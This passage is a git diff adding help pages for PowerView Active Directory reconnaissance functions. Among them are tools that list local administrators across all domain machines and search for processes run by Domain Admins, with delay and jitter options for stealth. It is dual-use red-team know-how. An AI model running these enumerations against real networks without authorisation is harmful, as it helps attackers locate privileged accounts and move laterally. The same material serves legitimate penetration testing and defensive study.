b/docs/Recon/ConvertFrom-SID.md new file mode 100755 index 0000000..186e19b --- /dev/null +++ b/docs/Recon/ConvertFrom-SID.md @@ -0,0 +1,126 @@ +# ConvertFrom-SID + +## SYNOPSIS +Converts a security identifier (SID) to a group/user name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName + +## SYNTAX + +``` +ConvertFrom-SID [-ObjectSid] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 +``` + +TESTLAB\harmj0y + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID +``` + +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -ObjectSid +Specifies one or more SIDs to convert. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SID + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SID strings on the pipeline. + +## OUTPUTS + +### String + +The converted DOMAIN\username. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md new file mode 100755 index 0000000..c75f942 --- /dev/null +++ b/docs/Recon/ConvertFrom-UACValue.md @@ -0,0 +1,127 @@ +# ConvertFrom-UACValue + +## SYNOPSIS +Converts a UAC int value to human readable form. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +ConvertFrom-UACValue [-Value] [-ShowAll] +``` + +## DESCRIPTION +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. +By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-UACValue -Value 66176 +``` + +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll +``` + +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 + +## PARAMETERS + +### -Value +Specifies the integer UAC value to convert. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: UAC, useraccountcontrol + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### Int + +Accepts an integer representing a UAC binary blob. + +## OUTPUTS + +### System.Collections.Specialized.OrderedDictionary + +An ordered dictionary with the converted UAC fields. + +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md new file mode 100755 index 0000000..71e9cea --- /dev/null +++ b/docs/Recon/ConvertTo-SID.md @@ -0,0 +1,120 @@ +# ConvertTo-SID + +## SYNOPSIS +Converts a given user/group name to a security identifier (SID). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain + +## SYNTAX + +``` +ConvertTo-SID [-ObjectName] [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. +If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertTo-SID 'DEV\dfm' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred + +## PARAMETERS + +### -ObjectName +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, Identity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more username specification strings on the pipeline. + +## OUTPUTS + +### String + +A string representing the SID of the translated name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md new file mode 100755 index 0000000..1597249 --- /dev/null +++ b/docs/Recon/Export-PowerViewCSV.md @@ -0,0 +1,117 @@ +# Export-PowerViewCSV + +## SYNOPSIS +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Export-PowerViewCSV -InputObject [-Path] [[-Delimiter] ] [-Append] +``` + +## DESCRIPTION +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. +This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. + +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' +``` + +## PARAMETERS + +### -InputObject +Specifies the objects to export as CSV strings. + +```yaml +Type: PSObject[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the path to the CSV output file. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delimiter +Specifies a delimiter to separate the property values. +The default is a comma (,) + +```yaml +Type: Char +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: , +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Append +Indicates that this cmdlet adds the CSV output to the end of the specified file. +Without this parameter, Export-PowerViewCSV replaces the file contents without warning. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### PSObject + +Accepts one or more PSObjects on the pipeline. + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/) + diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md new file mode 100755 index 0000000..be4055f --- /dev/null +++ b/docs/Recon/Find-DomainLocalGroupMember.md @@ -0,0 +1,351 @@ +# Find-DomainLocalGroupMember + +## SYNOPSIS +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainLocalGroupMember [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-GroupName ] [-Method ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainLocalGroupMember +``` + +Enumerates the local group memberships for all reachable machines in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainLocalGroupMember -Domain dev.testlab.local +``` + +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred + +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md new file mode 100755 index 0000000..280e8ef --- /dev/null +++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md @@ -0,0 +1,261 @@ +# Find-DomainObjectPropertyOutlier + +## SYNOPSIS +Finds user/group/computer objects in AD that have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass + +## SYNTAX + +### ClassName (Default) +``` +Find-DomainObjectPropertyOutlier [-ClassName] [-ReferencePropertySet ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### ReferenceObject +``` +Find-DomainObjectPropertyOutlier [-ReferencePropertySet ] -ReferenceObject + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass. +If a -ReferenceObject is passed, the class is extracted from the passed object. +A 'reference' set of property names is then calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. +These property names are substracted +from the master schema propertyu name list to retrieve a set of 'non-standard' properties. +Every user/group/computer object (depending on determined class) are enumerated, and for each +object, if the object has a 'non-standard' property set, the object samAccountName, property +name, and property value are output to the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainObjectPropertyOutlier -User +``` + +Enumerates users in the current domain with 'outlier' properties filled in. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainObjectPropertyOutlier -Group -Domain external.local +``` + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier +``` + +Enumerates computers in the current domain with 'outlier' properties filled in. + +## PARAMETERS + +### -ClassName +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +```yaml +Type: String +Parameter Sets: ClassName +Aliases: Class + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferencePropertySet +Specifies an array of property names to diff against the class schema. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferenceObject +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. + +```yaml +Type: PSObject +Parameter Sets: ReferenceObject +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md new file mode 100755 index 0000000..89dc568 --- /dev/null +++ b/docs/Recon/Find-DomainProcess.md @@ -0,0 +1,517 @@ +# Find-DomainProcess + +## SYNOPSIS +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +## SYNTAX + +### None (Default) +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserGroupIdentity ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-Threads ] +``` + +### TargetProcess +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-ProcessName ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### TargetUser +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] + [-UserGroupIdentity ] [-UserAdminCount] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. +If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainProcess +``` + +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainProcess -ProcessName putty.exe +``` + +Searchings for instances of putty.exe running on the current domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcessName +Search for processes with one or more specific names. + +```yaml +Type: String[] +Parameter Sets: TargetProcess +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity, TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: TargetUser +Aliases: AdminCount + +Required: 